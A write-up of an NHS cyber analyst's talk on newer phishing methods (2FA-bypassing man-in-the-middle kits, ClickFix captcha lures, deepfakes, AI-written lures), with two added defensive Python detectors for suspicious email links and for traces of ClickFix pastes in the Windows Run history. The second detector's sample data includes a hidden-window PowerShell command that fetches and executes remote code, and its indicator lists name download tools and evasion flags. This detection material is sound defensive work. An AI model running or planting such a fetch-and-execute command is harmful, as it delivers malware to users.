NHS Cyber Associates Network – Beyond Phishing: The evolution of hacking humans
The Cyber Associates Network (CAN), which forms part of the NHS’s cyber security arm, hosted an NHS cyber threat analyst, Francis, who gave an insightful presentation on how phishing attacks are evolving.
The core message of the presentation was that social engineering is still the primary weapon in phishing, but with the use of AI the landscape has become more sophisticated, making the traditional ways of spotting phishing attacks less relevant.
Man in the middle attacks
A man-in-the-middle (MITM) attack, in its simplest form, is an attacker intercepting your data or connection and redirecting it, or you, somewhere else. An example: you, the user, receive an email from your bank asking you to click on a link to log in; this email is a fake phishing email. Once you click on the link you are taken to a legitimate-looking banking website, but the details you enter are sent in real time to the attacker.
A new and highly sophisticated version of this is called Tycoon 2FA, which specifically targets two-factor authentication. It is notable in that it can bypass 2FA. The attack works exactly as described above, but with the additional step of being able to use the 2FA code that the user is sent and inputs.
Behind the scenes of this attack is an extremely complicated piece of software that is using NHS.connect infrastructure. This attack is behind a rise in data breaches within the NHS.
This style of attack doesn’t have many ‘tells’ that users can be vigilant for. The best ways to spot it are to check for URLs that look suspicious and for hyperlinks on the redirected page that don’t work.
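The advice above, checking whether a link really goes where it claims to, can be applied to an email body before anyone clicks. The following is an added example, not code from the presentation: it parses the anchors in an email's HTML and flags three things a MITM phishing page relies on (display text that hides a different host, a host that name-drops a trusted brand without being that site, and plain-http or raw-IP login links). The sample email body and the trusted-domain list are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an email body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def _host(value):
    """Lower-cased hostname of a URL or bare domain (no scheme, port or path)."""
    if "://" not in value:
        value = "https://" + value
    return (urlparse(value).hostname or "").lower()

def check_links(html, trusted_domains):
    """Return (href, reason) findings for anchors that deserve a second look."""
    parser = _LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        host = _host(href)
        # 1. Visible text looks like a URL but the link really goes elsewhere.
        if re.fullmatch(r"(https?://)?[\w.-]+\.[a-z]{2,}(/\S*)?", text, re.I) and _host(text) != host:
            findings.append((href, f"display text '{text}' hides host {host}"))
        # 2. Host name-drops a trusted brand but is neither that site nor one of its subdomains.
        for trusted in trusted_domains:
            if trusted.split(".")[0] in host and not (host == trusted or host.endswith("." + trusted)):
                findings.append((href, f"lookalike of {trusted}"))
        # 3. Plain http or a raw IP address is not how a real bank serves a login page.
        if href.lower().startswith("http://") or re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
            findings.append((href, "plain http or raw IP address"))
    return findings

# Constructed sample email body (not from the presentation); hosts are reserved test names.
SAMPLE_EMAIL = (
    '<p>Please <a href="https://examplebank.secure-login.invalid/auth">log in</a> at '
    '<a href="http://203.0.113.7/login">https://www.examplebank.example</a>.</p>'
)
```

Running `check_links(SAMPLE_EMAIL, ["examplebank.example"])` reports the first link as a lookalike and the second both for the hidden host and for the plain-http raw IP; a genuine link under the trusted domain produces no findings.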
Captcha attacks
Captcha is something that we’ll all be familiar with, being asked to prove that we’re human to enter a website by clicking on several images or answering a simple question.
An attack using Captcha is called ClickFix and sees the user inputting malicious code into the Windows Run dialog or terminal. The user is first presented with a seemingly genuine Captcha, such as selecting buses, then a second Captcha asks the user to use keyboard shortcuts to open the Windows terminal and paste in code that delivers malware or a trojan.
This works because, as users, we’re used to completing Captchas, and many users are unfamiliar with the Run dialog and terminal.
There is also a theoretical evolution of this that uses Windows File Explorer to achieve similar goals.
There are no simple ‘tells’ that users can look out for with this style of attack. There are technical solutions to ‘lock down’ the terminal and dialog boxes, but they require administration rights and technical know-how.
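Because there are few user-visible tells, detection after the fact matters. Windows records Run-dialog history in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so a pasted ClickFix command usually leaves a trace there. The following is an added example, not code from the presentation: it scores exported RunMRU entries against a small indicator list. The indicator list, the scoring threshold and the sample export (with a placeholder URL) are this example's own construction.

```python
import re
from dataclasses import dataclass

# Indicator lists are this example's own choices, not from the presentation.
LAUNCHERS = r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|curl)\b"
EVASION_FLAGS = r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|-e(xecutionpolicy|p)\s+bypass)"
FETCH_AND_RUN = r"\b(iex|invoke-expression|irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b|https?://"
LURE_TEXT = r"(not a robot|captcha|verif(y|ication))"  # reassuring words a lure adds to the pasted command

@dataclass
class Finding:
    value_name: str
    command: str
    score: int
    reasons: list

def score_run_entry(command):
    """Score a single Run-dialog command; each matched indicator adds one point."""
    c = command.lower()
    reasons = []
    if re.search(LAUNCHERS, c):
        reasons.append("script interpreter or download tool launched from Run")
    if re.search(EVASION_FLAGS, c):
        reasons.append("hidden-window, encoded-command or policy-bypass flag")
    if re.search(FETCH_AND_RUN, c):
        reasons.append("fetches and executes remote content")
    if re.search(LURE_TEXT, c):
        reasons.append("captcha/verification wording inside a command")
    return len(reasons), reasons

def scan_runmru(entries, threshold=2):
    """entries: RunMRU value name -> data, as exported from the registry. Returns findings at or above threshold."""
    findings = []
    for name, raw in entries.items():
        if name == "MRUList":            # ordering string, not a command
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw   # Windows appends a literal "\1" to each entry
        score, reasons = score_run_entry(cmd)
        if score >= threshold:
            findings.append(Finding(name, cmd, score, reasons))
    return sorted(findings, key=lambda f: -f.score)

# Constructed RunMRU export (not real data): two ordinary entries and one ClickFix-shaped paste
# with a placeholder URL; "\\1" in Python source is the literal backslash-1 suffix Windows stores.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\reports\\1",
    "c": 'powershell -w hidden -nop -c "irm hxxp://example.invalid/v | iex" # I am not a robot\\1',
}
```

An ordinary `cmd /c ping` scores one point and stays below the threshold, so everyday Run-dialog use is not reported; the threshold is the knob to tune against your own estate.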
Deepfakes
Deepfakes use AI to create fake images, audio and video. In the context of phishing these are normally of people, to try and gain trust and bypass security systems. Right now we’re on the cusp of their capabilities and, if you’re familiar with AI-generated video and audio, they can be spotted. However, they are improving very quickly and becoming cheaper, lowering the barrier to entry. Many organisations and people have fallen victim to phishing attacks using deepfakes, including a high-profile example in which the CEO of a UK-based energy firm’s parent company was impersonated (using AI voice) to steal £243,000.
AI use in other phishing attacks
AI is also being used to help generate and review phishing messages, making them more believable and free of the usual giveaways of poor grammar and spelling.
AI can be used for ‘market research’: asking AI to research an organisation, its mission, projects, leadership structure and so on. This research can be done in a fraction of the time it would traditionally take, giving attackers access to far more information about your organisation.
AI-generated code. AI LLMs can be used to create code and scripts such as malware and other viruses. Cyber security is increasingly seeing a rise in cyber-attacks as a service, where attackers buy malicious content from the dark web that can be deployed easily with little technical knowledge. This means the attacker doesn’t always have the knowledge to undo the damage they cause, even if a ransom is paid.
A separate style of attack that also tries to bypass traditional technical solutions is the use of QR codes within phishing emails, directing users away from your IT infrastructure to somewhere the attacker controls.
Are there any solutions?
These more sophisticated attacks do present some real challenges. While there are technical solutions, the reality is that cyber security is playing catch-up with cyber attackers.
For users, the best way to reduce the likelihood of falling victim to a phishing attack remains the same as before: recognise the emotive elements of phishing attacks.
Authority: Is the message claiming to be from someone official? For example, your bank, a solicitor, CQC or a government department. Criminals often pretend to be important people or organisations to trick you into doing what they want.
Urgency: Are you told you have a limited time to respond (such as ‘within 24 hours’ or ‘immediately’)? Attackers often threaten you with fines or other consequences if you don’t respond quickly.
Emotion: Does the message make you panic, fearful, hopeful or curious? Attackers often use threatening language, make false claims of support, or tease you into wanting to find out more.
Scarcity: Is the message offering something in short supply, like concert tickets, money, or a cure for medical conditions? Fear of missing out on a good deal or opportunity can make you respond quickly.
Current events: Are you expecting to see a message like this? Attackers often exploit current news stories, big events, or specific times of year (like tax reporting) to make their scam seem more relevant to you.
If you have any specific concerns or would like to discuss this topic further, please contact daniel.plummer@rcpa.org.uk
